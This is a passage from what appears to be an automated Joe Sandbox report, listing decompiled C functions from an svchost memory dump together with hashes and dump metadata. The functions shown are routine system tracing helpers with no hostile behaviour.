                        • Opcode Fuzzy Hash: 0cb4ce8b564c908d64a2858c82f3af6898da1b6b2a3f4fec6d223a8aca27c0d1
                        • Instruction Fuzzy Hash: A40184B56026497FC251EB69CE80E97B7ACEF89650B000625F6088BA11CB34ED11C6E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E030E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x311d360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E0306FA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1033;
                        				if(E03047D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0c7f7633fe34255c61a1118fed9180f014bf74a6c45add0d28a8a944733d5dde
                        • Instruction ID: 16d966d1bb1403bccd14886a5b37d41778c47415fb848408dca9702c96df6d79
                        • Opcode Fuzzy Hash: 0c7f7633fe34255c61a1118fed9180f014bf74a6c45add0d28a8a944733d5dde
                        • Instruction Fuzzy Hash: 2A015275A01318AFCB14DFA9D841EEEB7B8EF84710F044066B914EB280DA749A41C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E030E14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x311d360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E0306FA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1034;
                        				if(E03047D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2668a36e6e9f714e4b55fcfe31bf18f40967a6016ec8485fde20c2f2aea855fe
                        • Instruction ID: f2b59e0214f5e2c5bf71c5213c3f2229be483265702c65c1b3500af44df46b02
                        • Opcode Fuzzy Hash: 2668a36e6e9f714e4b55fcfe31bf18f40967a6016ec8485fde20c2f2aea855fe
                        • Instruction Fuzzy Hash: 11015275A01358AFCB14DF69D845EEEB7B8EF84710F444066F915EB380DA74DA40CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E030258EC(intOrPtr __ecx) {
                        				signed int _v8;
                        				char _v28;
                        				char _v44;
                        				char _v76;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t10;
                        				intOrPtr _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_v8 =  *0x311d360 ^ _t29;
                        				_t10 =  *[fs:0x30];
                        				_t27 = __ecx;
                        				if(_t10 == 0) {
                        					L6:
                        					_t28 = 0x3005c80;
                        				} else {
                        					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                        					if(_t16 == 0) {
                        						goto L6;
                        					} else {
                        						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                        					}
                        				}
                        				if(E03025943() != 0 &&  *0x3115320 > 5) {
                        					E030A7B5E( &_v44, _t27);
                        					_t22 =  &_v28;
                        					E030A7B5E( &_v28, _t28);
                        					_t11 = E030A7B9C(0x3115320, 0x300bf15,  &_v28, _t22, 4,  &_v76);
                        				}
                        				return E0306B640(_t11, _t17, _v8 ^ _t29, 0x300bf15, _t27, _t28);
                        			}
















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 85d235a58a95382e851e0a73b91a2934313c544257c5081b041740a516457718
                        • Instruction ID: 00bb7c9d20ad199a54b322eb70c9c4968e819ec4d76ff5a8db4a216b8dbce6bd
                        • Opcode Fuzzy Hash: 85d235a58a95382e851e0a73b91a2934313c544257c5081b041740a516457718
                        • Instruction Fuzzy Hash: A801F771A12618ABC714EBAADC00AFEFBE9EFC6520F5840699805DB244DF30DD06C754
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0303B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                        				signed char _t11;
                        				signed char* _t12;
                        				intOrPtr _t24;
                        				signed short* _t25;
                        
                        				_t25 = __edx;
                        				_t24 = __ecx;
                        				_t11 = ( *[fs:0x30])[0x50];
                        				if(_t11 != 0) {
                        					if( *_t11 == 0) {
                        						goto L1;
                        					}
                        					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                        					L2:
                        					if( *_t12 != 0) {
                        						_t12 =  *[fs:0x30];
                        						if((_t12[0x240] & 0x00000004) == 0) {
                        							goto L3;
                        						}
                        						if(E03047D50() == 0) {
                        							_t12 = 0x7ffe0385;
                        						} else {
                        							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t12 & 0x00000020) == 0) {
                        							goto L3;
                        						}
                        						return E030A7016(_a4, _t24, 0, 0, _t25, 0);
                        					}
                        					L3:
                        					return _t12;
                        				}
                        				L1:
                        				_t12 = 0x7ffe0384;
                        				goto L2;
                        			}








                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: 96dcc5f6b2bd30ab8ecd7fbf86374e5f6b749016fbd7421cc39716543da68f06
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 9601847130AA80DFD322DB5DC944FAA77DCEB86B54F0D44A2F915CBA51D728DC40CA20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030F1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                        				char _v8;
                        				void* _v11;
                        				unsigned int _v12;
                        				void* _v15;
                        				void* __esi;
                        				void* __ebp;
                        				char* _t16;
                        				signed int* _t35;
                        
                        				_t22 = __ebx;
                        				_t35 = __ecx;
                        				_v8 = __edx;
                        				_t13 =  !( *__ecx) + 1;
                        				_v12 =  !( *__ecx) + 1;
                        				if(_a4 != 0) {
                        					E030F165E(__ebx, 0x3118ae4, (__edx -  *0x3118b04 >> 0x14) + (__edx -  *0x3118b04 >> 0x14), __edi, __ecx, (__edx -  *0x3118b04 >> 0x14) + (__edx -  *0x3118b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                        				}
                        				E030EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                        				if(E03047D50() == 0) {
                        					_t16 = 0x7ffe0388;
                        				} else {
                        					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				if( *_t16 != 0) {
                        					_t16 = E030DFE3F(_t22, _t35, _v8, _v12);
                        				}
                        				return _t16;
                        			}












                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da40b31780209b5de37eb5ee877c92717e11327f84c020c6b475e5dcedbe3db9
                        • Instruction ID: 8e5ef6b2fd75579bfdd258e927d2fe076156ada1cb43fdc285ff348d6d3cbfea
                        • Opcode Fuzzy Hash: da40b31780209b5de37eb5ee877c92717e11327f84c020c6b475e5dcedbe3db9
                        • Instruction Fuzzy Hash: 2C019772205341EFC314EF29C940B5AB7E5ABC4300F08CA29F98287A90EF70D840CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E030DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x311d360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E0306FA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x267;
                        				if(E03047D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 42a03fdebbbc49caae26c0361a5b3c86c949347d6ddf5020d771801f50fb36bf
                        • Instruction ID: 4b8e2556df310b239832494eab5ef7d129d433415dada878f8d3f818d4d5f4c3
                        • Opcode Fuzzy Hash: 42a03fdebbbc49caae26c0361a5b3c86c949347d6ddf5020d771801f50fb36bf
                        • Instruction Fuzzy Hash: F4018475A01319ABCB14DFA9D845FAEB7F8EF84700F044066B901EF281DA749A01CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E030DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x311d360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E0306FA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x266;
                        				if(E03047D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 77663a273dfdaed12fba6871ab5eb1bd4c9e29ea69ebf85f9e185b649a270c71
                        • Instruction ID: a5607b018f872632b351c0291301085119361e45bafc1cfcad15a6450fb4d11c
                        • Opcode Fuzzy Hash: 77663a273dfdaed12fba6871ab5eb1bd4c9e29ea69ebf85f9e185b649a270c71
                        • Instruction Fuzzy Hash: 92018475A01319ABCB14DFA9D845FAEB7F8EF84700F044066B901EF280DA749A01C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E030F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				short _v66;
                        				char _v72;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v12 =  *0x311d360 ^ _t32;
                        				_t31 = _a8;
                        				_t30 = _a12;
                        				_v66 = 0x1c20;
                        				_v40 = __ecx;
                        				_v36 = __edx;
                        				_v32 = _a4;
                        				_v28 = _a8;
                        				_v24 = _a12;
                        				if(E03047D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v72);
                        				_push(0x14);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E0306B640(E03069AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cb07d6ad306ab5b74c9ba2ab5f322b2c3df8bccc87a818877fda974aced472f
                        • Instruction ID: cc9d97736c563fe029ab23e07d98e86709acdd9cf77cffbb7fa27829e7936ad9
                        • Opcode Fuzzy Hash: 0cb07d6ad306ab5b74c9ba2ab5f322b2c3df8bccc87a818877fda974aced472f
                        • Instruction Fuzzy Hash: D1011EB5A01218AFDB04DFA9D9419EEB7F8EF88710F10405AF904EB341D634AA008BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E030F8ED6(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				short _v62;
                        				char _v68;
                        				signed char* _t29;
                        				intOrPtr _t35;
                        				intOrPtr _t41;
                        				intOrPtr _t42;
                        				signed int _t43;
                        
                        				_t40 = __edx;
                        				_v8 =  *0x311d360 ^ _t43;
                        				_v28 = __ecx;
                        				_v62 = 0x1c2a;
                        				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                        				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                        				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                        				_v24 = __edx;
                        				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                        				if(E03047D50() == 0) {
                        					_t29 = 0x7ffe0386;
                        				} else {
                        					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v68);
                        				_push(0x1c);
                        				_push(0x20402);
                        				_push( *_t29 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62475c19103205d016b263934731a72d6f6861e58fe6ba380830b5cc185c3309
                        • Instruction ID: f74b5a135bae7c444d9f9e7acb58c8b173e5cfd1321185b9456ff6791c682124
                        • Opcode Fuzzy Hash: 62475c19103205d016b263934731a72d6f6861e58fe6ba380830b5cc185c3309
                        • Instruction Fuzzy Hash: A4111EB4A112199FDB04DFA9D541BAEF7F4FF08300F0482AAE518EB781E6349A40CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0302DB60(signed int __ecx) {
                        				intOrPtr* _t9;
                        				void* _t12;
                        				void* _t13;
                        				intOrPtr _t14;
                        
                        				_t9 = __ecx;
                        				_t14 = 0;
                        				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                        					_t13 = 0xc000000d;
                        				} else {
                        					_t14 = E0302DB40();
                        					if(_t14 == 0) {
                        						_t13 = 0xc0000017;
                        					} else {
                        						_t13 = E0302E7B0(__ecx, _t12, _t14, 0xfff);
                        						if(_t13 < 0) {
                        							L0302E8B0(__ecx, _t14, 0xfff);
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                        							_t14 = 0;
                        						} else {
                        							_t13 = 0;
                        							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                        						}
                        					}
                        				}
                        				 *_t9 = _t14;
                        				return _t13;
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: b9b71b8069bc8ab9d43fc6146beb411042600c03594a09eeef5b086bc640f1ca
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: 8AF09C37247632DBD733EA5588A0FABFE959FC2A60F190435F6159F344CA608C0297D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0302B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                        				signed char* _t13;
                        				intOrPtr _t22;
                        				char _t23;
                        
                        				_t23 = __edx;
                        				_t22 = __ecx;
                        				if(E03047D50() != 0) {
                        					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                        				} else {
                        					_t13 = 0x7ffe0384;
                        				}
                        				if( *_t13 != 0) {
                        					_t13 =  *[fs:0x30];
                        					if((_t13[0x240] & 0x00000004) == 0) {
                        						goto L3;
                        					}
                        					if(E03047D50() == 0) {
                        						_t13 = 0x7ffe0385;
                        					} else {
                        						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                        					}
                        					if(( *_t13 & 0x00000020) == 0) {
                        						goto L3;
                        					}
                        					return E030A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                        				} else {
                        					L3:
                        					return _t13;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 1d65b0c15daa9c513e831aa437858cdc6bc386f44b3f33f4578089df10206041
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 5001D132202790EBD322E75EC804FA9BBD8EF91750F0D48A1F9548F6B1D678C800C354
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E030BFE87(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_v8 =  *0x311d360 ^ _t35;
                        				_v16 = __ecx;
                        				_v54 = 0x1722;
                        				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                        				_v28 =  *((intOrPtr*)(__ecx + 4));
                        				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                        				if(E03047D50() == 0) {
                        					_t21 = 0x7ffe0382;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c5bb2a9072577ed2540f5d63343e15eaa8a88e72e5fa3e27deaa1491eafe11dc
                        • Instruction ID: 0b57897d037b6258218fd468057635d58c0017b564b93e1ed6bb37cf3d49e692
                        • Opcode Fuzzy Hash: c5bb2a9072577ed2540f5d63343e15eaa8a88e72e5fa3e27deaa1491eafe11dc
                        • Instruction Fuzzy Hash: CB016274A01309AFCB14DFA8D941AAEB7F4EF08300F144569B514DF382DA35DA01CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E030E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x311d360 ^ _t32;
                        				_v20 = _a4;
                        				_v12 = _a8;
                        				_v24 = __ecx;
                        				_v16 = __edx;
                        				_v50 = 0x1021;
                        				if(E03047D50() == 0) {
                        					_t18 = 0x7ffe0380;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4bcd0d92b670aababc4a6a13330367feb3772484dcd0bdaa71d2ea318d31837
                        • Instruction ID: df1a474eee645ad8b560cf1c98e710f939b492ac577fb35e54b054ed9f993109
                        • Opcode Fuzzy Hash: a4bcd0d92b670aababc4a6a13330367feb3772484dcd0bdaa71d2ea318d31837
                        • Instruction Fuzzy Hash: 040131B5A01208AFCB04EFA9D545AAEB7F4FF48700F104059B815EB341E6349A00CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E030F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x311d360 ^ _t32;
                        				_v16 = __ecx;
                        				_v50 = 0x1c2c;
                        				_v24 = _a4;
                        				_v20 = _a8;
                        				_v12 = __edx;
                        				if(E03047D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x402);
                        				_push( *_t18 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
